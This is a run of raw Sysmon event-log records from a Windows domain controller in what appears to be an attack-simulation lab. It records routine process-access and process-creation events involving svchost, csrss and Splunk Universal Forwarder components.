10341000x80000000000000009544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93A0-6005-DC04-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93A0-6005-DC04-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-93A0-6005-DC04-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.167{59A5CD1D-93A0-6005-DB04-00000000A301}1156996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93A0-6005-DB04-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93A0-6005-DB04-00000000A301}1156C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93A0-6005-DB04-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-93A0-6005-DB04-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93A1-6005-DD04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 